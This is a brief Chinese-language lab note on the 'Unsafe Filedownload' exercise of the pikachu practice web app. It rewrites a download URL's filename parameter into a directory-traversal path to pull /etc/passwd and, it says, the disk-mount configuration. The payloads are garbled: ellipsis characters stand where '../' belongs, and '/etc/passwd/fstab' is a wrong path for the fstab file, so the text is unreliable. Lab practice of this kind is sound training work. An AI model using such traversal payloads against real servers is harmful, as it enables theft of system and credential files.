在pikachu上 Unsafe Filedownload 中 Unsafe Filedownload 任意下载一个图片(注:右键 点击 “新建标签页打开链接”)
看URL:127.0.0.1/pikachu/vul/unsafedownload/execdownload.php?filename=ns.png
改为:127.0.0.1/pikachu/vul/unsafedownload/execdownload.php?filename=…/…/…/…/…/…/…/…/…/etc/passwd
或者:127.0.0.1/pikachu/vul/unsafedownload/execdownload.php?filename=…/…/…/…/…/…/…/…/…/etc/passwd/fstab (磁盘挂载的配置文件)
即可下载相应文件
(由于与视频中的电脑不一样 文件也不一样 所以没有图片演示 视频中linux系统)